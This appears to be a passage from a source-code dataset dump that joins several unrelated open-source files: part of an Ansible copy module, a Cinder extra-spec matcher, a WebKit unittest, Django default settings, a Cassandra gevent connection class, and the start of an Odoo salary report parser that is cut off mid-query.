        left_only_changed = copy_left_only(b_src_item_path, b_dest_item_path, module)
        if diff_files_changed or left_only_changed:
            changed = True

        # Previously only the first level of common directories was
        # compared, so entries differing deeper than one level were
        # silently skipped.  Recurse to cover the whole tree.
        if copy_common_dirs(b_src_item_path, b_dest_item_path, module):
            changed = True
    return changed
def main():
module = AnsibleModule(
# not checking because of daisy chain to file module
argument_spec=dict(
src=dict(type='path'),
_original_basename=dict(type='str'), # used to handle 'dest is a directory' via template, a slight hack
content=dict(type='str', no_log=True),
dest=dict(type='path', required=True),
backup=dict(type='bool', default=False),
force=dict(type='bool', default=True, aliases=['thirsty']),
validate=dict(type='str'),
directory_mode=dict(type='raw'),
remote_src=dict(type='bool'),
local_follow=dict(type='bool'),
checksum=dict(),
),
add_file_common_args=True,
supports_check_mode=True,
)
src = module.params['src']
b_src = to_bytes(src, errors='surrogate_or_strict')
dest = module.params['dest']
# Make sure we always have a directory component for later processing
if os.path.sep not in dest:
dest = '.{0}{1}'.format(os.path.sep, dest)
b_dest = to_bytes(dest, errors='surrogate_or_strict')
backup = module.params['backup']
force = module.params['force']
_original_basename = module.params.get('_original_basename', None)
validate = module.params.get('validate', None)
follow = module.params['follow']
local_follow = module.params['local_follow']
mode = module.params['mode']
owner = module.params['owner']
group = module.params['group']
remote_src = module.params['remote_src']
checksum = module.params['checksum']
if not os.path.exists(b_src):
module.fail_json(msg="Source %s not found" % (src))
if not os.access(b_src, os.R_OK):
module.fail_json(msg="Source %s not readable" % (src))
# Preserve is usually handled in the action plugin but mode + remote_src has to be done on the
# remote host
if module.params['mode'] == 'preserve':
module.params['mode'] = '0%03o' % stat.S_IMODE(os.stat(b_src).st_mode)
mode = module.params['mode']
checksum_dest = None
if os.path.isfile(src):
checksum_src = module.sha1(src)
else:
checksum_src = None
# Backwards compat only. This will be None in FIPS mode
try:
if os.path.isfile(src):
md5sum_src = module.md5(src)
else:
md5sum_src = None
except ValueError:
md5sum_src = None
changed = False
if checksum and checksum_src != checksum:
module.fail_json(
msg='Copied file does not match the expected checksum. Transfer failed.',
checksum=checksum_src,
expected_checksum=checksum
)
# Special handling for recursive copy - create intermediate dirs
if _original_basename and dest.endswith(os.sep):
dest = os.path.join(dest, _original_basename)
b_dest = to_bytes(dest, errors='surrogate_or_strict')
dirname = os.path.dirname(dest)
b_dirname = to_bytes(dirname, errors='surrogate_or_strict')
if not os.path.exists(b_dirname):
try:
(pre_existing_dir, new_directory_list) = split_pre_existing_dir(dirname)
except AnsibleModuleError as e:
e.result['msg'] += ' Could not copy to {0}'.format(dest)
module.fail_json(**e.results)
os.makedirs(b_dirname)
directory_args = module.load_file_common_arguments(module.params)
directory_mode = module.params["directory_mode"]
if directory_mode is not None:
directory_args['mode'] = directory_mode
else:
directory_args['mode'] = None
adjust_recursive_directory_permissions(pre_existing_dir, new_directory_list, module, directory_args, changed)
if os.path.isdir(b_dest):
basename = os.path.basename(src)
if _original_basename:
basename = _original_basename
dest = os.path.join(dest, basename)
b_dest = to_bytes(dest, errors='surrogate_or_strict')
if os.path.exists(b_dest):
if os.path.islink(b_dest) and follow:
b_dest = os.path.realpath(b_dest)
dest = to_native(b_dest, errors='surrogate_or_strict')
if not force:
module.exit_json(msg="file already exists", src=src, dest=dest, changed=False)
if os.access(b_dest, os.R_OK) and os.path.isfile(dest):
checksum_dest = module.sha1(dest)
else:
if not os.path.exists(os.path.dirname(b_dest)):
try:
# os.path.exists() can return false in some
# circumstances where the directory does not have
# the execute bit for the current user set, in
# which case the stat() call will raise an OSError
os.stat(os.path.dirname(b_dest))
except OSError as e:
if "permission denied" in to_native(e).lower():
module.fail_json(msg="Destination directory %s is not accessible" % (os.path.dirname(dest)))
module.fail_json(msg="Destination directory %s does not exist" % (os.path.dirname(dest)))
if not os.access(os.path.dirname(b_dest), os.W_OK) and not module.params['unsafe_writes']:
module.fail_json(msg="Destination %s not writable" % (os.path.dirname(dest)))
backup_file = None
if checksum_src != checksum_dest or os.path.islink(b_dest):
if not module.check_mode:
try:
if backup:
if os.path.exists(b_dest):
backup_file = module.backup_local(dest)
# allow for conversion from symlink.
if os.path.islink(b_dest):
os.unlink(b_dest)
open(b_dest, 'w').close()
if validate:
# if we have a mode, make sure we set it on the temporary
# file source as some validations may require it
if mode is not None:
module.set_mode_if_different(src, mode, False)
if owner is not None:
module.set_owner_if_different(src, owner, False)
if group is not None:
module.set_group_if_different(src, group, False)
if "%s" not in validate:
module.fail_json(msg="validate must contain %%s: %s" % (validate))
(rc, out, err) = module.run_command(validate % src)
if rc != 0:
module.fail_json(msg="failed to validate", exit_status=rc, stdout=out, stderr=err)
b_mysrc = b_src
if remote_src and os.path.isfile(b_src):
_, b_mysrc = tempfile.mkstemp(dir=os.path.dirname(b_dest))
shutil.copyfile(b_src, b_mysrc)
try:
shutil.copystat(b_src, b_mysrc)
except OSError as err:
if err.errno == errno.ENOSYS and mode == "preserve":
module.warn("Unable to copy stats {0}".format(to_native(b_src)))
else:
raise
module.atomic_move(b_mysrc, dest, unsafe_writes=module.params['unsafe_writes'])
except (IOError, OSError):
module.fail_json(msg="failed to copy: %s to %s" % (src, dest), traceback=traceback.format_exc())
changed = True
else:
changed = False
if checksum_src is None and checksum_dest is None:
if remote_src and os.path.isdir(module.params['src']):
b_src = to_bytes(module.params['src'], errors='surrogate_or_strict')
b_dest = to_bytes(module.params['dest'], errors='surrogate_or_strict')
if src.endswith(os.path.sep) and os.path.isdir(module.params['dest']):
diff_files_changed = copy_diff_files(b_src, b_dest, module)
left_only_changed = copy_left_only(b_src, b_dest, module)
common_dirs_changed = copy_common_dirs(b_src, b_dest, module)
owner_group_changed = chown_recursive(b_dest, module)
if diff_files_changed or left_only_changed or common_dirs_changed or owner_group_changed:
changed = True
if src.endswith(os.path.sep) and not os.path.exists(module.params['dest']):
b_basename = to_bytes(os.path.basename(src), errors='surrogate_or_strict')
b_dest = to_bytes(os.path.join(b_dest, b_basename), errors='surrogate_or_strict')
b_src = to_bytes(os.path.join(module.params['src'], ""), errors='surrogate_or_strict')
if not module.check_mode:
shutil.copytree(b_src, b_dest, symlinks=not(local_follow))
chown_recursive(dest, module)
changed = True
if not src.endswith(os.path.sep) and os.path.isdir(module.params['dest']):
b_basename = to_bytes(os.path.basename(src), errors='surrogate_or_strict')
b_dest = to_bytes(os.path.join(b_dest, b_basename), errors='surrogate_or_strict')
b_src = to_bytes(os.path.join(module.params['src'], ""), errors='surrogate_or_strict')
if not module.check_mode and not os.path.exists(b_dest):
shutil.copytree(b_src, b_dest, symlinks=not(local_follow))
changed = True
chown_recursive(dest, module)
if module.check_mode and not os.path.exists(b_dest):
changed = True
if os.path.exists(b_dest):
diff_files_changed = copy_diff_files(b_src, b_dest, module)
left_only_changed = copy_left_only(b_src, b_dest, module)
common_dirs_changed = copy_common_dirs(b_src, b_dest, module)
owner_group_changed = chown_recursive(b_dest, module)
if diff_files_changed or left_only_changed or common_dirs_changed or owner_group_changed:
changed = True
if not src.endswith(os.path.sep) and not os.path.exists(module.params['dest']):
b_basename = to_bytes(os.path.basename(module.params['src']), errors='surrogate_or_strict')
b_dest = to_bytes(os.path.join(b_dest, b_basename), errors='surrogate_or_strict')
if not module.check_mode and not os.path.exists(b_dest):
os.makedirs(b_dest)
b_src = to_bytes(os.path.join(module.params['src'], ""), errors='surrogate_or_strict')
diff_files_changed = copy_diff_files(b_src, b_dest, module)
left_only_changed = copy_left_only(b_src, b_dest, module)
common_dirs_changed = copy_common_dirs(b_src, b_dest, module)
owner_group_changed = chown_recursive(b_dest, module)
if diff_files_changed or left_only_changed or common_dirs_changed or owner_group_changed:
changed = True
if module.check_mode and not os.path.exists(b_dest):
changed = True
res_args = dict(
dest=dest, src=src, md5sum=md5sum_src, checksum=checksum_src, changed=changed
)
if backup_file:
res_args['backup_file'] = backup_file
module.params['dest'] = dest
if not module.check_mode:
file_args = module.load_file_common_arguments(module.params)
res_args['changed'] = module.set_fs_attributes_if_different(file_args, res_args['changed'])
module.exit_json(**res_args)
# Standard module entry point: run main() only when executed directly.
if __name__ == '__main__':
    main()
| gpl-3.0 |
inkerra/cinder | cinder/openstack/common/scheduler/filters/extra_specs_ops.py | 21 | 2336 | # Copyright (c) 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import operator
from cinder.openstack.common import strutils
# 1. The following operations are supported:
# =, s==, s!=, s>=, s>, s<=, s<, <in>, <is>, <or>, ==, !=, >=, <=
# 2. Note that <or> is handled in a different way below.
# 3. If the first word in the extra_specs is not one of the operators,
# it is ignored.
# Operator table for extra-spec requirement strings.
# NOTE: '=' maps to ">=" (minimum-value semantics) on purpose — see the
# operator list in the comment block above; 's'-prefixed operators compare
# lexicographically as strings, the bare ones compare numerically.
_op_methods = {'=': lambda x, y: float(x) >= float(y),
               '<in>': lambda x, y: y in x,
               '<is>': lambda x, y: (strutils.bool_from_string(x) is
                                     strutils.bool_from_string(y)),
               '==': lambda x, y: float(x) == float(y),
               '!=': lambda x, y: float(x) != float(y),
               '>=': lambda x, y: float(x) >= float(y),
               '<=': lambda x, y: float(x) <= float(y),
               's==': operator.eq,
               's!=': operator.ne,
               's<': operator.lt,
               's<=': operator.le,
               's>': operator.gt,
               's>=': operator.ge}


def match(value, req):
    """Check whether *value* satisfies the extra-spec requirement *req*.

    *req* is either a plain string (compared for simple equality) or a
    string of the form "<operator> operand", e.g. ">= 10", "s== foo" or
    "<or> v1 <or> v2".  Returns a bool; a numeric operator applied to a
    non-numeric operand makes the requirement fail instead of raising.
    """
    words = req.split()

    op = method = None
    if words:
        op = words.pop(0)
        method = _op_methods.get(op)

    # First word is not a recognized operator: fall back to exact equality.
    if op != '<or>' and not method:
        return value == req

    if value is None:
        return False

    if op == '<or>':  # Ex: <or> v1 <or> v2 <or> v3
        # Guard with "while words" so a bare "<or>" with no operands simply
        # fails to match instead of raising IndexError on pop().
        while words:
            if words.pop(0) == value:
                return True
            if not words:
                break
            words.pop(0)  # remove the next '<or>' keyword
        return False

    try:
        if words and method(value, words[0]):
            return True
    except ValueError:
        # e.g. float() failed on a non-numeric operand; treat as no match.
        pass

    return False
| apache-2.0 |
percy-g2/Novathor_xperia_u8500 | 6.1.1.B.0.253/external/webkit/Tools/Scripts/webkitpy/layout_tests/port/webkit_unittest.py | 15 | 4864 | #!/usr/bin/env python
# Copyright (C) 2010 Gabor Rapcsanyi <rgabor@inf.u-szeged.hu>, University of Szeged
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY UNIVERSITY OF SZEGED ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UNIVERSITY OF SZEGED OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.system import filesystem_mock
from webkitpy.layout_tests.port.webkit import WebKitPort
from webkitpy.layout_tests.port import port_testcase
class TestWebKitPort(WebKitPort):
    """WebKitPort test double whose probes return injected canned data.

    symbol_list / feature_list feed the symbol and runtime-feature probes,
    while expectations_file / skips_file override the expectation sources.
    """
    def __init__(self, symbol_list=None, feature_list=None,
                 expectations_file=None, skips_file=None, **kwargs):
        self.symbol_list = symbol_list
        self.feature_list = feature_list
        self.expectations_file = expectations_file
        self.skips_file = skips_file
        WebKitPort.__init__(self, **kwargs)
    def _runtime_feature_list(self):
        # Canned data instead of querying a real DumpRenderTree binary.
        return self.feature_list
    def _supported_symbol_list(self):
        return self.symbol_list
    def _tests_for_other_platforms(self):
        return ["media"]
    def _tests_for_disabled_features(self):
        return ["accessibility"]
    def path_to_test_expectations_file(self):
        # Fall back to the real port lookup when no override was injected.
        if not self.expectations_file:
            return WebKitPort.path_to_test_expectations_file(self)
        return self.expectations_file
    def _skipped_file_paths(self):
        return [self.skips_file] if self.skips_file else []
class WebKitPortTest(port_testcase.PortTestCase):
    """Exercises the feature/symbol/Skipped-file logic shared by WebKit ports."""
    def port_maker(self, platform):
        return WebKitPort
    def test_driver_cmd_line(self):
        # Routine is not implemented.
        pass
    def test_baseline_search_path(self):
        # Routine is not implemented.
        pass
    def test_skipped_directories_for_symbols(self):
        # Symbols present in the build imply features; everything else is skipped.
        supported_symbols = ["GraphicsLayer", "WebCoreHas3DRendering", "isXHTMLMPDocument", "fooSymbol"]
        expected_directories = set(["mathml", "fast/canvas/webgl", "compositing/webgl", "http/tests/canvas/webgl", "http/tests/wml", "fast/wml", "wml", "fast/wcss"])
        result_directories = set(TestWebKitPort(supported_symbols, None)._skipped_tests_for_unsupported_features())
        self.assertEqual(result_directories, expected_directories)
    def test_skipped_directories_for_features(self):
        supported_features = ["Accelerated Compositing", "Foo Feature"]
        expected_directories = set(["animations/3d", "transforms/3d"])
        result_directories = set(TestWebKitPort(None, supported_features)._skipped_tests_for_unsupported_features())
        self.assertEqual(result_directories, expected_directories)
    def test_skipped_layout_tests(self):
        # Merges "other platform" and "disabled feature" skip lists.
        self.assertEqual(TestWebKitPort(None, None).skipped_layout_tests(),
                         set(["media", "accessibility"]))
    def test_test_expectations(self):
        # Check that we read both the expectations file and anything in a
        # Skipped file, and that we include the feature and platform checks.
        files = {
            '/tmp/test_expectations.txt': 'BUG_TESTEXPECTATIONS SKIP : fast/html/article-element.html = FAIL\n',
            '/tmp/Skipped': 'fast/html/keygen.html',
        }
        mock_fs = filesystem_mock.MockFileSystem(files)
        port = TestWebKitPort(expectations_file='/tmp/test_expectations.txt',
                              skips_file='/tmp/Skipped', filesystem=mock_fs)
        self.assertEqual(port.test_expectations(),
                         """BUG_TESTEXPECTATIONS SKIP : fast/html/article-element.html = FAIL
BUG_SKIPPED SKIP : fast/html/keygen.html = FAIL
BUG_SKIPPED SKIP : media = FAIL
BUG_SKIPPED SKIP : accessibility = FAIL""")
# Allow running this test file directly.
if __name__ == '__main__':
    unittest.main()
| gpl-2.0 |
chaosk/trinitee | trinitee/settings_default.py | 1 | 5192 | # pylint: disable-all
"""
settings_default.py
Do NOT (!!!) edit this file!
Please override settings in settings_local.py instead.
"""
import os
import sys
from django.core.urlresolvers import reverse
from django.utils.functional import lazy
# Django settings for trinitee project.
# Project root: the directory containing this settings module.
PROJECT_DIR = os.path.dirname(__file__)
# Make bundled third-party packages in lib/vendor importable.
sys.path.insert(0, os.path.join(os.path.join(PROJECT_DIR, "lib"), "vendor"))
DEBUG = False
TEMPLATE_DEBUG = False
# When True, TEMPLATE_LOADERS below are wrapped in Django's cached loader.
TEMPLATE_CACHING = True
INTERNAL_IPS = ('127.0.0.1',)
ADMINS = (
	# ('John Doe', 'joe@doe.com'),
)
MANAGERS = ADMINS
DATABASES = {
	'default': {
		# Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3'.
		'ENGINE': 'django.db.backends.sqlite3',
		# Or path to database file if using sqlite3.
		'NAME': PROJECT_DIR + '/trinitee.sqlite',
		# Not used with sqlite3.
		'USER': '',
		# Not used with sqlite3.
		'PASSWORD': '',
		# Set to empty string for localhost. Not used with sqlite3.
		'HOST': '',
		# Set to empty string for default. Not used with sqlite3.
		'PORT': '',
	}
}
MAILER_ADDRESS = ''
WEBMASTER_EMAIL = ''
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory that holds static files.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.path.join(MEDIA_ROOT, 'static')
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/media/static/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/static/admin/'
# Make this unique, and don't share it with anybody.
# NOTE(review): placeholder value -- must be overridden in settings_local.py.
SECRET_KEY = 'foobar'
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'UTC'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# User profile model
AUTH_PROFILE_MODULE = 'core.UserProfile'
ANONYMOUS_USER_ID = -1
# Message storage backend
MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
LOGIN_REDIRECT_URL = '/accounts/%(username)s/'
LOGIN_URL = '/accounts/signin/'
LOGOUT_URL = '/accounts/signout/'
# Lazy wrapper so reverse() runs only once the URLconf has been loaded.
reverse_lazy = lazy(reverse, str)
ABSOLUTE_URL_OVERRIDES = {
	# 'auth.user': lambda u: reverse_lazy('profile', kwargs={'user_id': u.id}),
}
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
	'django.template.loaders.filesystem.Loader',
	'django.template.loaders.app_directories.Loader',
	'django.template.loaders.eggs.Loader',
)
if TEMPLATE_CACHING:
	TEMPLATE_LOADERS = (
		('django.template.loaders.cached.Loader', TEMPLATE_LOADERS),
	)
SESSION_ENGINE = 'django.contrib.sessions.backends.file'
AUTHENTICATION_BACKENDS = (
	'userena.backends.UserenaAuthenticationBackend',
	'guardian.backends.ObjectPermissionBackend',
	'django.contrib.auth.backends.ModelBackend',
)
MIDDLEWARE_CLASSES = (
	'django.middleware.common.CommonMiddleware',
	'django.middleware.http.ConditionalGetMiddleware',
	'django.contrib.sessions.middleware.SessionMiddleware',
	'django.middleware.transaction.TransactionMiddleware',
	'reversion.middleware.RevisionMiddleware',
	'django.middleware.csrf.CsrfViewMiddleware',
	'django.contrib.auth.middleware.AuthenticationMiddleware',
	'django.contrib.messages.middleware.MessageMiddleware',
	'wiki.middleware.WikiWhitespaceMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
	'django.contrib.auth.context_processors.auth',
	'django.core.context_processors.debug',
	'django.core.context_processors.i18n',
	'django.core.context_processors.static',
	'django.core.context_processors.media',
	'django.core.context_processors.request',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
	os.path.join(PROJECT_DIR, 'templates'),
)
# Apps developed inside this project (also appended to INSTALLED_APPS).
PROJECT_APPS = (
	'core',
	'lib',
	# 'accounts',
	'forums',
	'wiki',
)
INSTALLED_APPS = (
	'django.contrib.auth',
	'django.contrib.contenttypes',
	'django.contrib.sessions',
	'django.contrib.sites',
	'django.contrib.messages',
	'django.contrib.admin',
	'guardian',
	'reversion',
	'south',
	'easy_thumbnails',
	'userena',
	'userena.contrib.umessages',
) + PROJECT_APPS
PYLINT_RCFILE = os.path.join(os.path.dirname(PROJECT_DIR), '.pylintrc') | bsd-3-clause |
HackerEarth/cassandra-python-driver | cassandra/io/geventreactor.py | 1 | 6547 | # Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gevent
from gevent import select, socket, ssl
from gevent.event import Event
from gevent.queue import Queue
from collections import defaultdict
from functools import partial
import logging
import os
from six.moves import xrange
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, EINVAL
from cassandra import OperationTimedOut
from cassandra.connection import Connection, ConnectionShutdown
from cassandra.protocol import RegisterMessage
log = logging.getLogger(__name__)
def is_timeout(err):
    """Return True if errno *err* is a transient 'operation in progress'
    condition rather than a real socket failure."""
    if err in (EINPROGRESS, EALREADY, EWOULDBLOCK):
        return True
    # EINVAL counts as a timeout only on Windows ('nt'/'ce') platforms.
    return err == EINVAL and os.name in ('nt', 'ce')
class GeventConnection(Connection):
    """
    An implementation of :class:`.Connection` that utilizes ``gevent``.
    """
    # Class-level defaults; instances overwrite these in __init__/close().
    _total_reqd_bytes = 0
    _read_watcher = None
    _write_watcher = None
    _socket = None
    @classmethod
    def factory(cls, *args, **kwargs):
        """Create a connection and block up to 'timeout' until it is ready."""
        timeout = kwargs.pop('timeout', 5.0)
        conn = cls(*args, **kwargs)
        conn.connected_event.wait(timeout)
        if conn.last_error:
            raise conn.last_error
        elif not conn.connected_event.is_set():
            conn.close()
            raise OperationTimedOut("Timed out creating connection")
        else:
            return conn
    def __init__(self, *args, **kwargs):
        Connection.__init__(self, *args, **kwargs)
        self.connected_event = Event()
        self._write_queue = Queue()
        self._callbacks = {}
        self._push_watchers = defaultdict(set)
        sockerr = None
        # Try every resolved address until one connects; keep the last error.
        addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
        for (af, socktype, proto, canonname, sockaddr) in addresses:
            try:
                self._socket = socket.socket(af, socktype, proto)
                if self.ssl_options:
                    self._socket = ssl.wrap_socket(self._socket, **self.ssl_options)
                self._socket.settimeout(1.0)
                self._socket.connect(sockaddr)
                sockerr = None
                break
            except socket.error as err:
                sockerr = err
        if sockerr:
            raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror))
        if self.sockopts:
            for args in self.sockopts:
                self._socket.setsockopt(*args)
        # One greenlet each for reading from and writing to this socket.
        self._read_watcher = gevent.spawn(self.handle_read)
        self._write_watcher = gevent.spawn(self.handle_write)
        self._send_options_message()
    def close(self):
        """Kill both watcher greenlets and close the socket (idempotent)."""
        with self.lock:
            if self.is_closed:
                return
            self.is_closed = True
        log.debug("Closing connection (%s) to %s" % (id(self), self.host))
        if self._read_watcher:
            self._read_watcher.kill(block=False)
        if self._write_watcher:
            self._write_watcher.kill(block=False)
        if self._socket:
            self._socket.close()
        log.debug("Closed socket to %s" % (self.host,))
        if not self.is_defunct:
            self.error_all_callbacks(
                ConnectionShutdown("Connection to %s was closed" % self.host))
            # don't leave in-progress operations hanging
            self.connected_event.set()
    def handle_close(self):
        log.debug("connection closed by server")
        self.close()
    def handle_write(self):
        """Writer greenlet: pop queued payloads and send them until killed."""
        run_select = partial(select.select, (), (self._socket,), ())
        while True:
            try:
                # Block for the next message, then wait for writability.
                next_msg = self._write_queue.get()
                run_select()
            except Exception as exc:
                if not self.is_closed:
                    log.debug("Exception during write select() for %s: %s", self, exc)
                    self.defunct(exc)
                return
            try:
                self._socket.sendall(next_msg)
            except socket.error as err:
                log.debug("Exception during socket sendall for %s: %s", self, err)
                self.defunct(err)
                return  # Leave the write loop
    def handle_read(self):
        """Reader greenlet: wait in select(), then drain the socket buffer."""
        run_select = partial(select.select, (self._socket,), (), ())
        while True:
            try:
                run_select()
            except Exception as exc:
                if not self.is_closed:
                    log.debug("Exception during read select() for %s: %s", self, exc)
                    self.defunct(exc)
                return
            try:
                # Keep reading until a short read signals the buffer is drained.
                while True:
                    buf = self._socket.recv(self.in_buffer_size)
                    self._iobuf.write(buf)
                    if len(buf) < self.in_buffer_size:
                        break
            except socket.error as err:
                if not is_timeout(err):
                    log.debug("Exception during socket recv for %s: %s", self, err)
                    self.defunct(err)
                    return  # leave the read loop
            if self._iobuf.tell():
                self.process_io_buffer()
            else:
                # Zero bytes read means the peer closed the connection.
                log.debug("Connection %s closed by server", self)
                self.close()
                return
    def push(self, data):
        """Queue 'data' for the writer greenlet, split into buffer-sized chunks."""
        chunk_size = self.out_buffer_size
        for i in xrange(0, len(data), chunk_size):
            self._write_queue.put(data[i:i + chunk_size])
    def register_watcher(self, event_type, callback, register_timeout=None):
        """Subscribe 'callback' to one server push event type."""
        self._push_watchers[event_type].add(callback)
        self.wait_for_response(
            RegisterMessage(event_list=[event_type]),
            timeout=register_timeout)
    def register_watchers(self, type_callback_dict, register_timeout=None):
        """Subscribe several event-type -> callback pairs with one REGISTER."""
        for event_type, callback in type_callback_dict.items():
            self._push_watchers[event_type].add(callback)
        self.wait_for_response(
            RegisterMessage(event_list=type_callback_dict.keys()),
            timeout=register_timeout)
| apache-2.0 |
Endika/odoo | addons/l10n_in_hr_payroll/report/report_hr_yearly_salary_detail.py | 374 | 6855 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP SA (<http://openerp.com>). All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import datetime
from openerp.report import report_sxw
from openerp.osv import osv
class employees_yearly_salary_report(report_sxw.rml_parse):
    """RML parser gathering an employee's payslip lines grouped by month.

    NOTE(review): Python 2 only code (uses the '<>' operator below).
    """
    def __init__(self, cr, uid, name, context):
        super(employees_yearly_salary_report, self).__init__(cr, uid, name, context)
        # Helpers exposed to the report template.
        self.localcontext.update({
            'time': time,
            'get_employee': self.get_employee,
            'get_employee_detail': self.get_employee_detail,
            'cal_monthly_amt': self.cal_monthly_amt,
            'get_periods': self.get_periods,
            'get_total': self.get_total,
            'get_allow': self.get_allow,
            'get_deduct': self.get_deduct,
        })
        self.context = context
    def get_periods(self, form):
        """Fill self.mnths with "m-yyyy" keys and return the month labels,
        padded to 12 columns so the report layout stays fixed."""
        self.mnths = []
        # Get start year-month-date and end year-month-date
        first_year = int(form['date_from'][0:4])
        last_year = int(form['date_to'][0:4])
        first_month = int(form['date_from'][5:7])
        last_month = int(form['date_to'][5:7])
        no_months = (last_year-first_year) * 12 + last_month - first_month + 1
        current_month = first_month
        current_year = first_year
        # Get name of the months from integer
        mnth_name = []
        for count in range(0, no_months):
            m = datetime.date(current_year, current_month, 1).strftime('%b')
            mnth_name.append(m)
            self.mnths.append(str(current_month) + '-' + str(current_year))
            # NOTE(review): the December rollover jumps straight to last_year,
            # which only works for ranges spanning at most two calendar years.
            if current_month == 12:
                current_month = 0
                current_year = last_year
            current_month = current_month + 1
        for c in range(0, (12-no_months)):
            mnth_name.append('')
            self.mnths.append('')
        return [mnth_name]
    def get_employee(self, form):
        """Browse the hr.employee records selected in the wizard."""
        return self.pool.get('hr.employee').browse(self.cr,self.uid, form.get('employee_ids', []), context=self.context)
    def get_employee_detail(self, form, obj):
        """Split the employee's payslip rows into allowance/deduction lists
        and accumulate self.total; always returns None (side effects only)."""
        self.allow_list = []
        self.deduct_list = []
        self.total = 0.00
        gross = False
        net = False
        payslip_lines = self.cal_monthly_amt(form, obj.id)
        for line in payslip_lines:
            # NOTE(review): "for line[0] in line" rebinds line[0] to each row
            # in turn; unusual but relied upon by the indexing below.
            for line[0] in line:
                if line[0][0] == "Gross":
                    gross = line[0]
                elif line[0][0] == "Net":
                    net = line[0]
                # Sign of column 13 decides allowance vs deduction -- the
                # last column holds the row total (see salary_list below).
                elif line[0][13] > 0.0 and line[0][0] != "Net":
                    self.total += line[0][len(line[0])-1]
                    self.allow_list.append(line[0])
                elif line[0][13] < 0.0:
                    self.total += line[0][len(line[0])-1]
                    self.deduct_list.append(line[0])
        if gross:
            self.allow_list.append(gross)
        if net:
            self.deduct_list.append(net)
        return None
    def cal_monthly_amt(self, form, emp_id):
        """Aggregate payslip line totals per category/rule/month for emp_id."""
        category_obj = self.pool.get('hr.salary.rule.category')
        result = []
        res = []
        salaries = {}
        self.cr.execute('''SELECT rc.code, pl.name, sum(pl.total), \
                        to_char(date_to,'mm-yyyy') as to_date FROM hr_payslip_line as pl \
                        LEFT JOIN hr_salary_rule_category AS rc on (pl.category_id = rc.id) \
